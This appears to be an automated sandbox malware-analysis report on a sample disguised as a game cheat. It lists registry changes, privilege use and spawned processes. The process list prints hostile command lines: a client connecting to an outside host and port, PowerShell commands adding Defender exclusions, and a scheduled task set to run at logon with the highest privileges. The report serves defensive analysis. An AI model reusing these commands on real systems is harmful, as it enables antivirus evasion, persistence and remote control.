| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3270530367-132075249-2153716227-1000\{EF036A7F-AF11-4345-9CC7-CE811E68EF8D} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133534299895306274" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 992739.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\cvtresa.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Test cheat.exe
"C:\Users\Admin\AppData\Local\Temp\Test cheat.exe"
C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
C:\Users\Admin\AppData\Local\Temp\switched.exe
"C:\Users\Admin\AppData\Local\Temp\switched.exe"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u5ebawk3\u5ebawk3.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES373C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDE2739B7113D4774B4711F2B45AE2B56.TMP"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\cvtresa.exe & exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Users\Admin\AppData\Local\Temp\cvtresa.exe
C:\Users\Admin\AppData\Local\Temp\cvtresa.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"' & exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp5217.tmp.bat""
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"'
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff9e0546f8,0x7fff9e054708,0x7fff9e054718
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
